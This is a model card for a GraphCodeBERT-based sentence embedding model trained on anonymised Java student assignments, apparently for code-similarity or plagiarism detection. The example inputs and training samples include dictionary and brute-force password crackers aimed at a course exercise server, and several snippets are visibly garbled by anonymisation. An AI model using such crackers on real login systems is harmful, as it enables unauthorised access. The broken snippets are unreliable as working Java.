SentenceTransformer based on microsoft/graphcodebert-base
This is a sentence-transformers model finetuned from microsoft/graphcodebert-base. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
Model Details
Model Description
- Model Type: Sentence Transformer
- Base model: microsoft/graphcodebert-base
- Maximum Sequence Length: 512 tokens
- Output Dimensionality: 768 dimensions
- Similarity Function: Cosine Similarity
Model Sources
- Documentation: Sentence Transformers Documentation
- Repository: Sentence Transformers on GitHub
- Hugging Face: Sentence Transformers on Hugging Face
Full Model Architecture
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
Usage
Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
pip install -U sentence-transformers
Then you can load this model and run inference.
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/SOCO-Java-GraphCodeBERT-ST")
# Run inference
sentences = [
'import java.io.*;\nimport java.net.*;\nimport java.net.HttpURLConnection;\nimport javax.net.*;\nimport java.security.cert.*;\n\npublic class Dictionary\n{\n\tpublic static void main(String[] args)\n\t{\n\t\tBufferedReader in = null;\n\t\tboolean found = true;\n\t\tString word = null;\n\t\tString cmd = null;\n\t\tRuntime run = Runtime.getRuntime();\n\t\tProcess pro = null;\n\t\tBufferedReader inLine = null;\n\n\n\n\t\tString str = null;\n\t\tURLConnection connection = null;\n\n\t\ttry\n\t\t{\n\t\t\tFileReader reader = new FileReader("words");\n\t\t\tin = new BufferedReader(reader);\n\t\t\tSystem.out.println(" cracking....");\n\t\t\t\n\t\t\t{\n\t\t\t\tfound = true;\n\t\t\t\tword = new String(in.readLine());\n\n\t\t\t\tcmd = "wget --http-user= --http-passwd="+word +" http://sec-crack.cs.rmit.edu./SEC/2/index.php";\n\n\t\t\t\tpro = run.exec(cmd);\n\t\t\t\tinLine = new BufferedReader(new InputStreamReader(pro.getErrorStream()));\n\n\n\t\t\t\tif((str=inLine.readLine())!=null)\n\t\t\t\t{\n\n\t\t\t\t\twhile ((str=inLine.readLine())!=null)\n\t\t\t\t\t{\n\t\t\t\t\t\tif (str.endsWith("Required"))\n\t\t\t\t\t\t{\n\n\t\t\t\t\t\t\tfound = false;\n\t\t\t\t\t\t}\n\n\t\t\t\t\t}\n\t\t\t\t}\n\n\n\n\n\n\n\t\t\t\trun.gc();\n\t\t\t}\n\t\t\twhile (!found);\n\n\n\n\n\n\t\t}\n\t\tcatch (FileNotFoundException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n\t\tcatch (IOException exc)\n\t\t{\n\t\t\tSystem.out.println(exc);\n\t\t}\n catch (NullPointerException ex)\n {\n System.out.println(word);\n }\n\t\tfinally\n\t\t{\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif (in!= null)\n\t\t\t\t{\n\t\t\t\t\tin.print();\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch (IOException e) {}\n\t\t}\n\t\tif (found == true)\n\t\t\tSystem.out.println("The password is :" + word);\n else\n System.out.println("NOT FOUND!");\n\t}\n}',
'\nimport java.net.*;\nimport java.io.*;\nimport java.misc.*;\nimport java.io.BufferedInputStream;\nimport java.awt.*;\nimport java.awt.event.*;\n\npublic class WriteFile\n{\n String url;\n String fileName;\n int flag;\n private PrintWriter out2;\n private TextArea response;\n int status;\n int mailFlag;\n\n public WriteFile (String newUrl, String newFileName, int newFlag)\n {\n url = newUrl;\n fileName = newFileName;\n PrintWriter printW = null;\n FileOutputStream fout;\n flag = newFlag;\n status = 0;\n mailFlag = 0;\n\n \n File file = new File(fileName);\n file.delete();\n\n try\n {\n fout = new FileOutputStream(fileName,true);\n printW = new PrintWriter(fout);\n }\n catch (IOException ioe)\n {\n System.out.println("IO Error : " + ioe);\n }\n\n\n URL u;\n URLConnection uc;\n\n try\n {\n u = new URL(url);\n try\n {\n \n uc = u.openConnection();\n\n InputStream content = (InputStream)uc.getInputStream();\n BufferedReader in = new BufferedReader (new InputStreamReader(content));\n\n String line;\n\n \n while ((line = in.readLine()) != null)\n {\n \n printW.println(line);\n\n }\n }\n catch (Exception e)\n {\n System.out.println("Error: " + e);\n }\n }\n catch (MalformedURLException e)\n {\n System.out.println(url + " is not a parseable URL");\n }\n \n printW.print();\n\n\n if(flag == 1)\n {\n \n compareDiff("@.rmit.edu.");\n }\n }\n\n String loadStream(InputStream in) throws IOException\n {\n int ptr = 0;\n in = new BufferedInputStream(in);\n StringBuffer buffer = new StringBuffer();\n\n while( (ptr = in.next()) != -1 )\n {\n status++;\n \n buffer.append((char)ptr);\n mailFlag++;\n \n }\n return buffer.toString();\n }\n\n public void compareDiff(String emailAdd)\n {\n String cmds = "diff test1.txt test2.txt";\n PrintWriter printW2 = null;\n FileOutputStream fout2;\n \n File file = new File("diff.txt");\n file.delete();\n String ;\n\n try\n {\n fout2 = new FileOutputStream("diff.txt",true);\n printW2 = new PrintWriter(fout2);\n }\n catch (IOException ioe)\n {\n System.out.println("IO Error : " + ioe);\n }\n\n try\n {\n\n\n \n Process ps = Runtime.getRuntime().exec(cmds);\n PrintWriter out = new PrintWriter(new OutputStreamWriter(ps.getOutputStream()));\n\n printW2.println(loadStream(ps.getInputStream())+"\\n");\n printW2.print();\n\n\n if(mailFlag != 0)\n {\n FileReader fRead2;\n BufferedReader buf2;\n\n try\n {\n fRead2 = new FileReader("diff.txt");\n buf2 = new BufferedReader(fRead2);\n String line2;\n int i=0;\n\n line = new String(" some changes the web as followed: \\n");\n \n Socket s = new Socket("wombat.cs.rmit.edu.", 25);\n out2 = new PrintWriter(s.getOutputStream());\n\n send(null);\n send("HELO cs.rmit.edu.");\n send("MAIL FROM: @.rmit.edu.");\n \n send("RCPT : @.rmit.edu.");\n send("DATA");\n \n\n while( (line2 = buf2.readLine()) != null)\n {\n \n line= new String(""+line2+"\\n");\n \n \n\n }\n \n \n \n out2.print();\n send(".");\n s.print();\n }\n catch(FileNotFoundException e)\n {\n System.out.println("File not found");\n }\n catch(IOException ioe)\n {\n System.out.println("IO Error " + ioe);\n }\n }\n\n System.out.println(loadStream(ps.getInputStream()));\n \n System.err.print(loadStream(ps.getErrorStream()));\n }\n catch(IOException ioe)\n {\n ioe.printStackTrace();\n }\n }\n\n public void send(String s) throws IOException\n {\n \tresponse = new TextArea();\n \tif(s != null)\n \t{\n response.append(s + "\\n");\n out2.println(s);\n\t out2.flush();\n\t}\n }\n\n public int getStatus()\n {\n return status;\n }\n}',
'import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\nclass Dictionary {\n\n private String password="";\n\n private int num=401;\n\n\n public static void main(String[] args) {\n\n\n Dictionary URLcon;\n\n int length = 0;\n\n String passwd="";\n\n int t0,t1;\n\n String line ="";\n \n if (args.length == 0) {\n \t\n System.err.println (\n \t\t\n \t\t"Usage : java BruteForce <username>");\n return;\n \t\n }\n \n String username = args[0];\n \n \n t0=System.currentTimeMillis();\n \n System.out.println (" " + new Date());\n System.out.println ("Using Dictionary method attack "+username+"\'s password. Please waiting.......");\n\n try{ BufferedReader in = new BufferedReader(new FileReader("/usr/share/lib/dict/words"));\n\n while ((passwd=in.readLine())!=null) {\n\n \t URLcon = new Dictionary (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n \tdouble dt =t1-t0;\n\n \tSystem.out.println("It took "+DecimalFormat.getInstance().format(dt/1000)+ " seconds");\n \n System.out.println ("Finish " + new Date());\n \n \treturn;\n\n }\n\n\n \t}\n\n }catch (FileNotFoundException e){\n \tSystem.out.println(e);\n }catch (IOException e){\n \tSystem.out.println(e);\n }\n\n\n System.out.println(" not find the password");\n\n\n}\n\n public Dictionary (String password,String username) {\n\n \t String urlString = "http://sec-crack.cs.rmit.edu./SEC/2/" ;\n\n \n try {\n\n String userPassword = username+":"+password ;\n\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\n uc.setRequestProperty ("Authorization", " " + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n catch(MalformedURLException e){\n \t System.out.println(e);\n }catch(IOException e){\n System.out.println(e);\n }\n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
Training Details
Training Dataset
Unnamed Dataset
- Size: 33,411 training samples
- Columns:
sentence_0
,sentence_1
, andlabel
- Approximate statistics based on the first 1000 samples:
sentence_0 sentence_1 label type string string int details - min: 61 tokens
- mean: 478.83 tokens
- max: 512 tokens
- min: 61 tokens
- mean: 490.04 tokens
- max: 512 tokens
- 0: ~99.80%
- 1: ~0.20%
- Samples:
sentence_0 sentence_1 label
import java.net.;
import java.io.;
public class sendMail {
public void sendMail(String mailServer, String recipient, String result) {
try {
Socket s = new Socket(mailServer, 25);
BufferedReader in = new BufferedReader
(new InputStreamReader(s.getInputStream(), "8859_1"));
BufferedWriter out = new BufferedWriter
(new OutputStreamWriter(s.getOutputStream(), "8859_1"));
send(in, out, "HELO client");
send(in, out, "MAIL FROM: ");
send(in, out, "RCPT : " + recipient);
send(in, out, "DATA");
send(out, "Subject: ");
send(out, "From: Admin ");
send (out, "\n");
send(out, result);
send(out, "\n.\n");
send(in, out, "QUIT");
}
catch (Exception e) {
e.printStackTrace();
}
}
public void send(BufferedReader in, BufferedWriter out, String s) {
try {
out.write(s + "\n");
out.flush();
Sys...
import java.io.;
import java.util.;
import java.;
import java.net.;
public class WatchDog
{
static Process p = null;
static Process qproc = null;
static BufferedReader bf = null;
static StringTokenizer tok = null;
static String Path = null;
static String str = null;
static String urlStr=null;
static boolean changed = false;
static File indexfile = new File("index.html");
static File tmpfile = new File("tmpindex.html");
static File mdfile = new File("md5file.txt");
static File tmpmdfile = new File("tmpmd5file.txt");
static PrintWriter mailwriter = null;
public static void main(String[] args)
{
urlStr = "http://www.cs.rmit.edu./";
try
{
mailwriter = new PrintWriter(new BufferedWriter(new FileWriter("tomail.txt", false)));
getLatest(urlStr);
parseFile();
mailwriter.read();
if(changed)
{
System.out.println("Sending Mail");
...0
import java.io.;
import java.net.;
public class BruteForce
{
private String myUsername = "";
private String urlToCrack = "http://sec-crack.cs.rmit.edu./SEC/2";
private int NUM_CHARS = 52;
public static void main(String args[])
{
BruteForce bf = new BruteForce();
}
public BruteForce()
{
generatePassword();
}
public void generatePassword()
{
int index1 = 0, index2, index3;
char passwordChars[] = { 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I',
'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R',
'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i',
'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r',
's', 't', 'u', 'v', 'w', 'x', 'y', 'z' };
while(index1 < NUM_CHARS)
{
index2 = 0;
while(index2 < NUM_CHARS)
{
...
public class HoldSharedData
{
private int numOfConnections = 0;
private int startTime;
private int totalTime = 0;
private String[] password;
private int pwdCount;
public HoldSharedData( int time, String[] pwd, int count )
{
startTime = time;
password = pwd;
pwdCount = count;
}
public int getPwdCount()
{
return pwdCount;
}
public void setNumOfConnections( )
{
numOfConnections ++;
}
public int getNumOfConnections()
{
return numOfConnections;
}
public int getStartTime()
{
return startTime;
}
public void setTotalTime( int newTotalTime )
{
totalTime = newTotalTime;
}
public int getTotalTime()
{
return totalTime;
}
public String getPasswordAt( int index )
{
return password[index];
}
}0
import java.net.;
import java.io.;
public class sendMail {
public void sendMail(String mailServer, String recipient, String result) {
try {
Socket s = new Socket(mailServer, 25);
BufferedReader in = new BufferedReader
(new InputStreamReader(s.getInputStream(), "8859_1"));
BufferedWriter out = new BufferedWriter
(new OutputStreamWriter(s.getOutputStream(), "8859_1"));
send(in, out, "HELO client");
send(in, out, "MAIL FROM: ");
send(in, out, "RCPT : " + recipient);
send(in, out, "DATA");
send(out, "Subject: ");
send(out, "From: Admin ");
send (out, "\n");
send(out, result);
send(out, "\n.\n");
send(in, out, "QUIT");
}
catch (Exception e) {
e.printStackTrace();
}
}
public void send(BufferedReader in, BufferedWriter out, String s) {
try {
out.write(s + "\n");
out.flush();
Sys...
import java.net.;
import java.io.;
public class Base64Encoder
{
private final static char base64Array [] = {
'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H',
'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P',
'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',
'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f',
'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',
'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '0', '1', '2', '3',
'4', '5', '6', '7', '8', '9', '+', '/'
};
public static String encode (String string)
{
String encodedString = "";
byte bytes [] = string.getBytes ();
int i = 0;
int pad = 0;
while (i < bytes.length)
{
byte b1 = bytes [i++];
byte b2;
byte b3;
if (i >= bytes.length)
{
b2 = 0;
b3 = 0;
pad = 2;
}
else
{
b2 = bytes [i++];
if (i >= bytes.length)
...0
- Loss:
BatchAllTripletLoss
Training Hyperparameters
Non-Default Hyperparameters
per_device_train_batch_size
: 16per_device_eval_batch_size
: 16num_train_epochs
: 1multi_dataset_batch_sampler
: round_robin
All Hyperparameters
Click to expand
overwrite_output_dir
: Falsedo_predict
: Falseeval_strategy
: noprediction_loss_only
: Trueper_device_train_batch_size
: 16per_device_eval_batch_size
: 16per_gpu_train_batch_size
: Noneper_gpu_eval_batch_size
: Nonegradient_accumulation_steps
: 1eval_accumulation_steps
: Nonetorch_empty_cache_steps
: Nonelearning_rate
: 5e-05weight_decay
: 0.0adam_beta1
: 0.9adam_beta2
: 0.999adam_epsilon
: 1e-08max_grad_norm
: 1num_train_epochs
: 1max_steps
: -1lr_scheduler_type
: linearlr_scheduler_kwargs
: {}warmup_ratio
: 0.0warmup_steps
: 0log_level
: passivelog_level_replica
: warninglog_on_each_node
: Truelogging_nan_inf_filter
: Truesave_safetensors
: Truesave_on_each_node
: Falsesave_only_model
: Falserestore_callback_states_from_checkpoint
: Falseno_cuda
: Falseuse_cpu
: Falseuse_mps_device
: Falseseed
: 42data_seed
: Nonejit_mode_eval
: Falseuse_ipex
: Falsebf16
: Falsefp16
: Falsefp16_opt_level
: O1half_precision_backend
: autobf16_full_eval
: Falsefp16_full_eval
: Falsetf32
: Nonelocal_rank
: 0ddp_backend
: Nonetpu_num_cores
: Nonetpu_metrics_debug
: Falsedebug
: []dataloader_drop_last
: Falsedataloader_num_workers
: 0dataloader_prefetch_factor
: Nonepast_index
: -1disable_tqdm
: Falseremove_unused_columns
: Truelabel_names
: Noneload_best_model_at_end
: Falseignore_data_skip
: Falsefsdp
: []fsdp_min_num_params
: 0fsdp_config
: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap
: Noneaccelerator_config
: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed
: Nonelabel_smoothing_factor
: 0.0optim
: adamw_torchoptim_args
: Noneadafactor
: Falsegroup_by_length
: Falselength_column_name
: lengthddp_find_unused_parameters
: Noneddp_bucket_cap_mb
: Noneddp_broadcast_buffers
: Falsedataloader_pin_memory
: Truedataloader_persistent_workers
: Falseskip_memory_metrics
: Trueuse_legacy_prediction_loop
: Falsepush_to_hub
: Falseresume_from_checkpoint
: Nonehub_model_id
: Nonehub_strategy
: every_savehub_private_repo
: Nonehub_always_push
: Falsegradient_checkpointing
: Falsegradient_checkpointing_kwargs
: Noneinclude_inputs_for_metrics
: Falseinclude_for_metrics
: []eval_do_concat_batches
: Truefp16_backend
: autopush_to_hub_model_id
: Nonepush_to_hub_organization
: Nonemp_parameters
:auto_find_batch_size
: Falsefull_determinism
: Falsetorchdynamo
: Noneray_scope
: lastddp_timeout
: 1800torch_compile
: Falsetorch_compile_backend
: Nonetorch_compile_mode
: Noneinclude_tokens_per_second
: Falseinclude_num_input_tokens_seen
: Falseneftune_noise_alpha
: Noneoptim_target_modules
: Nonebatch_eval_metrics
: Falseeval_on_start
: Falseuse_liger_kernel
: Falseeval_use_gather_object
: Falseaverage_tokens_across_devices
: Falseprompts
: Nonebatch_sampler
: batch_samplermulti_dataset_batch_sampler
: round_robin
Training Logs
Epoch | Step | Training Loss |
---|---|---|
0.2393 | 500 | 0.1754 |
0.4787 | 1000 | 0.1994 |
0.7180 | 1500 | 0.209 |
0.9574 | 2000 | 0.1941 |
Framework Versions
- Python: 3.11.13
- Sentence Transformers: 4.1.0
- Transformers: 4.52.4
- PyTorch: 2.6.0+cu124
- Accelerate: 1.7.0
- Datasets: 3.6.0
- Tokenizers: 0.21.1
Citation
BibTeX
Sentence Transformers
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
BatchAllTripletLoss
@misc{hermans2017defense,
title={In Defense of the Triplet Loss for Person Re-Identification},
author={Alexander Hermans and Lucas Beyer and Bastian Leibe},
year={2017},
eprint={1703.07737},
archivePrefix={arXiv},
primaryClass={cs.CV}
}
- Downloads last month
- 13
Inference Providers
NEW
This model isn't deployed by any Inference Provider.
🙋
Ask for provider support
Model tree for buelfhood/SOCO-Java-GraphCodeBERT-ST
Base model
microsoft/graphcodebert-base